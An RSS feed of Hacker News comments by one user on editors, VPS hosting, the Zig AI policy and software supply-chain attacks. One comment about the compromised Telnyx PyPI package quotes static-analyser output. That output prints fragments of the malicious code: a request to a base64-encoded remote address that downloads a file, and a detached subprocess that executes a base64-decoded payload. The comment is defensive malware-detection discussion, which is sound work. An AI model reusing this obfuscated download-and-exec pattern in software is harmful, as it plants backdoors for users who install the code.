<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: f311a</title><link>https://news.ycombinator.com/user?id=f311a</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Fri, 15 May 2026 18:26:06 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=f311a" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by f311a in "Bun's experimental Rust rewrite hits 99.8% test compatibility on Linux x64 glibc"]]></title><description><![CDATA[
<p>I think the main problem with Bun is that they are trying to move very quickly.<p>Tigebeetle devs spend 90% time working on stability, safety, tests and so on. They don't need new features, they need reliable software. Their database is pretty simple in terms of features and their goal was always stability and speed. Bun devs spend the majority of the time adding new features.</p>
]]></description><pubDate>Sun, 10 May 2026 09:25:18 +0000</pubDate><link>https://news.ycombinator.com/item?id=48082336</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=48082336</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48082336</guid></item><item><title><![CDATA[New comment by f311a in "Meta in row after workers who saw smart glasses users having sex lose jobs"]]></title><description><![CDATA[
<p>Why do they even need workers to classify naked content? They could filter some content prior to passing it to workers. They already have models to moderate explicit content.</p>
]]></description><pubDate>Thu, 30 Apr 2026 14:01:36 +0000</pubDate><link>https://news.ycombinator.com/item?id=47962653</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47962653</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47962653</guid></item><item><title><![CDATA[New comment by f311a in "Zed 1.0"]]></title><description><![CDATA[
<p>They have presets from other IDEs and editors. I use a weird combination of Jetbrains and helix shortcuts with helix mode. Because I used them the most.</p>
]]></description><pubDate>Thu, 30 Apr 2026 07:36:58 +0000</pubDate><link>https://news.ycombinator.com/item?id=47959414</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47959414</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47959414</guid></item><item><title><![CDATA[New comment by f311a in "The Zig project's rationale for their anti-AI contribution policy"]]></title><description><![CDATA[
<p>You still have to review everything manually again anyway. It's a compiler for a language, bugs and bad architecture decisions cost a lot. They moved to codeberg, so there are less garbage PRs now. They try to grow a culture where you expected to deliver good code in the PRs so the review takes less time.<p>It takes like 5 minutes to spot garbage PRs manually. LLM can flood you with a wall of text where only half of the stuff make sense. Also, they can't really spot bad architecture. It's a compiler in an unpopular language, don't forget that.</p>
]]></description><pubDate>Thu, 30 Apr 2026 07:12:34 +0000</pubDate><link>https://news.ycombinator.com/item?id=47959244</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47959244</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47959244</guid></item><item><title><![CDATA[New comment by f311a in "Zed 1.0"]]></title><description><![CDATA[
<p>Just look at the PR, it's shows how it will look like. It's modal instead of a persistent tab.</p>
]]></description><pubDate>Wed, 29 Apr 2026 16:23:46 +0000</pubDate><link>https://news.ycombinator.com/item?id=47950611</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47950611</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47950611</guid></item><item><title><![CDATA[New comment by f311a in "Zed is 1.0"]]></title><description><![CDATA[
<p>Tabs will still be supported. Also, when you search for references, it also opens a new tab, even when all references are in the same file.</p>
]]></description><pubDate>Wed, 29 Apr 2026 15:04:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=47949459</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47949459</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47949459</guid></item><item><title><![CDATA[New comment by f311a in "Zed 1.0"]]></title><description><![CDATA[
<p>Too bad they did not include better search UI into this release.<p>When you search, Zed opens a new tab, which I hate.
Sometimes I just want to have a quick glance at some code and close the search using escape.<p>Telescope style search in vim, helix or JetBrains tools is so much better.<p><a href="https://github.com/zed-industries/zed/pull/46478" rel="nofollow">https://github.com/zed-industries/zed/pull/46478</a></p>
]]></description><pubDate>Wed, 29 Apr 2026 14:48:55 +0000</pubDate><link>https://news.ycombinator.com/item?id=47949222</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47949222</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47949222</guid></item><item><title><![CDATA[New comment by f311a in "Spam in conversational replies to blog posts"]]></title><description><![CDATA[
<p>This is a big problem for wordpress, but custom engines with a simple client-side checks (js based) get close to zero spam. All those spammers use technology fingerprinting services to obtain a list of blogs and they look for popular blog engines only.</p>
]]></description><pubDate>Thu, 23 Apr 2026 15:17:55 +0000</pubDate><link>https://news.ycombinator.com/item?id=47876767</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47876767</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47876767</guid></item><item><title><![CDATA[New comment by f311a in "Someone bought 30 WordPress plugins and planted a backdoor in all of them"]]></title><description><![CDATA[
<p>They inject backlinks, SEO spam to advertise payday loans, online pharmacy, casino and so on. 
Just imagine you can get 30k of links to your website at once. Google will rank that page very high.<p>One pharmacy shop that sells generics or unlicensed casino can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.</p>
]]></description><pubDate>Mon, 13 Apr 2026 18:29:00 +0000</pubDate><link>https://news.ycombinator.com/item?id=47756067</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47756067</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47756067</guid></item><item><title><![CDATA[New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"]]></title><description><![CDATA[
<p>You won't get such numbers on a $5 VPS, the SSDs that are used there are network attached and shared between users.</p>
]]></description><pubDate>Sun, 12 Apr 2026 09:54:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=47737817</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47737817</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47737817</guid></item><item><title><![CDATA[New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"]]></title><description><![CDATA[
<p>$5 VPS disks are nowhere near macbooks, they are shared between users and often connected via network. They don't seat close to CPU.</p>
]]></description><pubDate>Sun, 12 Apr 2026 09:51:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=47737792</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47737792</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47737792</guid></item><item><title><![CDATA[New comment by f311a in "I run multiple $10K MRR companies on a $20/month tech stack"]]></title><description><![CDATA[
<p>There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won’t make any financial difference if you are trying to run a small business.<p>Thinking about on how to fit everything on a $5 VPS does not help your business.</p>
]]></description><pubDate>Sun, 12 Apr 2026 08:17:23 +0000</pubDate><link>https://news.ycombinator.com/item?id=47737244</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47737244</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47737244</guid></item><item><title><![CDATA[New comment by f311a in "Axios compromised on NPM – Malicious versions drop remote access trojan"]]></title><description><![CDATA[
<p>What are you using that utilizes Apple containers?</p>
]]></description><pubDate>Tue, 31 Mar 2026 21:34:13 +0000</pubDate><link>https://news.ycombinator.com/item?id=47593755</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47593755</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47593755</guid></item><item><title><![CDATA[New comment by f311a in "Telnyx package compromised on PyPI"]]></title><description><![CDATA[
<p>GuardDog, but it's based on regexes</p>
]]></description><pubDate>Fri, 27 Mar 2026 19:29:37 +0000</pubDate><link>https://news.ycombinator.com/item?id=47547160</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47547160</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47547160</guid></item><item><title><![CDATA[New comment by f311a in "Telnyx package compromised on PyPI"]]></title><description><![CDATA[
<p>They did not even try to hide the payload that much.<p>Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.<p><pre><code>  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
  86:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
  10:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.</code></pre></p>
]]></description><pubDate>Fri, 27 Mar 2026 19:00:29 +0000</pubDate><link>https://news.ycombinator.com/item?id=47546827</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47546827</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47546827</guid></item><item><title><![CDATA[New comment by f311a in "A Faster Alternative to Jq"]]></title><description><![CDATA[
<p>JQ is very convenient, even if your files are more than 100GB.
I often need to extract one field from huge JSON line files, I just pipe jq to it to get results. It's slower, but implementing proper data processing will take more time.</p>
]]></description><pubDate>Fri, 27 Mar 2026 12:48:10 +0000</pubDate><link>https://news.ycombinator.com/item?id=47542074</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47542074</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47542074</guid></item><item><title><![CDATA[New comment by f311a in "LiteLLM Python package compromised by supply-chain attack"]]></title><description><![CDATA[
<p>There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.</p>
]]></description><pubDate>Tue, 24 Mar 2026 15:49:49 +0000</pubDate><link>https://news.ycombinator.com/item?id=47504462</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47504462</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47504462</guid></item><item><title><![CDATA[New comment by f311a in "Tell HN: Litellm 1.82.7 and 1.82.8 on PyPI are compromised"]]></title><description><![CDATA[
<p>Their previous release would be easily caught by static analysis. PTH is a novel technique.<p>Run all your new dependencies through static analysis and don't install the latest versions.<p>I implemented static analysis for Python that detects close to 90% of such injections.<p><a href="https://github.com/rushter/hexora" rel="nofollow">https://github.com/rushter/hexora</a></p>
]]></description><pubDate>Tue, 24 Mar 2026 14:27:56 +0000</pubDate><link>https://news.ycombinator.com/item?id=47503114</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47503114</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47503114</guid></item><item><title><![CDATA[New comment by f311a in "Translate Garry Tan's LinkedIn-speak to plain English"]]></title><description><![CDATA[
<p>They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.<p><a href="https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text=we+were+hacked" rel="nofollow">https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...</a></p>
]]></description><pubDate>Thu, 19 Mar 2026 09:06:46 +0000</pubDate><link>https://news.ycombinator.com/item?id=47436680</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47436680</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47436680</guid></item><item><title><![CDATA[New comment by f311a in "Show HN: LogClaw – Open-source AI SRE that auto-creates tickets from logs"]]></title><description><![CDATA[
<p>Why is this upvoted? The author did not even bother to read what he wrote.<p>> SOC 2 Type II ready<p>Huh? You vibecoded the repo in a week and claim it ready?</p>
]]></description><pubDate>Thu, 12 Mar 2026 18:00:52 +0000</pubDate><link>https://news.ycombinator.com/item?id=47354784</link><dc:creator>f311a</dc:creator><comments>https://news.ycombinator.com/item?id=47354784</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47354784</guid></item></channel></rss>